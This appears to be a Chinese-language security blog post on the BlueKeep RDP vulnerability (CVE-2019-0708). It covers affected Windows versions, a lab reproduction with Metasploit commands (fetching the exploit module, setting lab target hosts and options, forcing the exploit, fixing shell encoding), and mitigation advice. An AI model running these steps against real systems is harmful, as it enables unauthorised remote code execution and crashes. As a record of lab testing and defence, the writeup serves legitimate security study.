0x01 漏洞描述
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广如:windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。2019年9月7日晚上凌晨1点左右,metaspolit更新了漏洞利用程序
在2019年5月,微软发布了针对远程代码执行漏洞CVE-2019-0708的补丁更新,该漏洞也称为“BlueKeep”,漏洞存在于远程桌面服务(RDS)的代码中。此漏洞是预身份验证,无需用户交互,因此具有潜在武器化蠕虫性性漏洞利用的危险。如果成功利用此漏洞,则可以使用“系统”权限执行任意代码。Microsoft安全响应中心的建议表明这个漏洞也可能会成为一种蠕虫攻击行为,类似于Wannacry和EsteemAudit等攻击行为。由于此漏洞的严重性及其对用户的潜在影响,微软采取了罕见的预警步骤,为不再受支持的Windows XP操作系统发布补丁,以保护Windows用户。
0x02 漏洞影响
该漏洞影响旧版本的Windows系统,包括:
Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。
Windows 8和Windows 10及之后版本不受此漏洞影响。
0x03 漏洞复现
msf版本metasploit v5.0.47-dev-9a6830c0adc0f5afa9bf144375ea8e016af7adbd
靶机: win7 sp1 7601 和 win2008r2 sp1 english standard
Windows7 SP1下载地址:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
win2008r2 sp1 下载地址:
Exp下载:
1 |
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb |
移动到exp到msf中(mac为例)
找到对应的msf路径中
1 |
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit |
移动exp到msf中(kali)
1 |
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/ |
msfconsole
msf5>reload_all. #重新加载所有模块
msf5>search 0708
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
其中Required为yes的为必须设置项
看到必须设置rhosts 和 rport
查看到靶机ip为192.168.1.111
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.111
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
未知原因,试了好几个靶机,都没办法复现成功。
据说有人用这个靶机复现成功了:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
1、开启3389,关闭防火墙
2、四个target,0代表自动根据指纹自动判断情况(亲测不好用),1代表真实机器,2代表目标系统在virtualbox虚拟机下运行,3代表目标系统在VMWare虚拟机下运行,4代表目标系统在Hyper-V虚拟机下运行。
3、在拿到shell以后显示乱码
原因是linux编码为utf8,而windows是gbk编码,两者统一就行了。
修改为utf8则执行
chcp 65001
4、提示ForceExploit错误
你需要将ForceExploit设置为true
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set forceexploit true
5、在打2008的时候需要在注册表中修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]值修改为0,但是打了也还是蓝屏。#成功率也很低,蓝屏率特别高。
6、看了网上很多人的文章,也都是说打的蓝屏。总的来说,这个漏洞的质量并没有MS17_010永恒之蓝的高,没打成就变成蓝屏了。而且利用起来貌似限制蛮多的。单核服务器上成功率约90%, 双核上 40-60%, 四核上10%,如果失败,目标系统会蓝屏。
0x04 漏洞修复补丁以及安全意见
有些windows 2008系统打不了补丁的一般是数据中心版本,可以设置一下服务器,计算机右键属性-远程设置-仅允许运行使用网络基本身份验证的远程桌面的计算机连接(更安全)(N),在这行点勾,然后确认即可,可以临时的防止漏洞的攻击。
如果对补丁不知道该如何修复的,可以启用阿里云的端口安全策略,禁止掉3389远程端口,只允许自己的IP通信即可。
Windows Server 2008 32位系统:
Windows Server 2008 x64位系统:
Windows Server 2008 R2 Itanium系统:
Windows Server 2008 R2 x64系统:
Windows Server 2008 Itanium:
Windows Server 2003 32位系统:
Windows Server 2003 64位系统:
Windows XP SP3 32位系统:
Windows XP SP2 64位系统:
Windows XP SP3 for XPe:
参考:https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961
FROM :b0urne.top | Author:b0urne
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论